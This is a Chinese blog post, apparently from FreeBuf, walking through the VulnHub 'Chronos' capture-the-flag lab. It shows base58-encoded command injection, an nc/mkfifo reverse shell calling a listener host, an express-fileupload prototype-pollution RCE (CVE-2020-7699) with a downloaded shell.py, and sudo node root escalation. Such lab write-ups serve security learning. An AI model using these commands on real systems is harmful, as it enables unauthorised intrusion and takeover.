freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Chronos靶机渗透
hailong86 2022-06-30 20:55:54 156679
所属地 吉林省

1.靶机介绍

靶机下载地址:https://www.vulnhub.com/entry/chronos-1,735/
靶机介绍:
Description
Difficulty : medium
This works better with VirtualBox rather than VMware。
靶机IP:10.8.1.251

2.端口发现

扫描靶机信息,发现开放了22、25、80、110、8000端口
图片.png

3.WEB访问

访问web80和8000端口,都没有什么可利用的
图片.png图片.png查看源码,发现可疑的url,http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL
图片.png将chronos.local添加到/etc/hosts下正常解析
图片.png再次访问80网站,4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL这一串应该是日期命令
图片.pnghttp://chronos.local:8000/date?format=ls,将format后边随便加个ls,报错,非base58字符
图片.png那就用base解密一下4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL,日期命令
图片.png在web80端口利用burpsuite抓包,这里有2个包,一个是OPTIONS的包是80端口的先放过去,然后会有一个GET的向chronos.local:8000发送的请求包,发现User-Agent: Chronos和OPIIONS包的不同,执行pwd命令,用base58加密得到5JeBr9q,运行后成功返回当前目录为/opt/chronos。
图片.png查看下/etc/passwd,成功执行,只有一个imera用户
图片.png

4.反弹shell

利用nc 反弹shell,rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.1.169 1234 >/tmp/f经过base58加密得到2gxfnU3zJpKCbHYT5fzvYdqM2TL9waXViedX88Z8vgmKyvFDw7fCgTnFfh8qwVeVw6NkvRhjRzq3iDgmko7c7TeM5AksHZV6oe5,直接添加在format=之后运行就可以。
图片.png图片.png本机开启监听,执行后反弹成功。
图片.pngpython -c 'import pty;pty.spawn("/bin/bash")'升级下shell,在/opt目录又发现个chronos-v2目录,backend目录,依次查看
图片.png

5.express-fileupload RCE漏洞利用

express-fileupload文件上传,在本地监听了8080端口
图片.png查找express-fileupload漏洞,CVE-2020-7699,ejs模板引擎存在一个利用原型污染,进行RCE
图片.png在https://blog.p6.is/Real-World-JS-1/得到利用代码
图片.png已经得到靶机监听的是本地8080端口,更改一下代码,写入到shell.py
图片.png本地开启python -m http.server 80,靶机下载shell.py到/tmp下
图片.png本地开启监听,靶机给shell.py赋权,执行,成功反弹连接
图片.png图片.png

6.提权

进到/home/imera下,查看user.txt,得到flag:byBjaHJvbm.9zIHBlcm5hZWkgZmlsZSBtb3UK。
图片.png习惯性sudo -l,发现可以不需要密码执行/usr/local/bin/npm *和/usr/local/bin/node *
图片.pngpython -c 'import pty;pty.spawn("/bin/bash")'先升级下shell,尝试了npm无法提权,那就用node提权
图片.png直接执行sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})',得到root权限,拿到flag:YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK。
图片.png

# 渗透测试 # 网络安全 # web安全 # 系统安全 # 漏洞分析
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 hailong86 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
hailong86 LV.5
这家伙太懒了,还未填写个人描述!
  • 25 文章数
  • 11 关注者
Vikings靶机渗透
2023-03-03
HA Rudra靶机渗透
2022-12-18
EVM靶机通关
2022-12-05
文章目录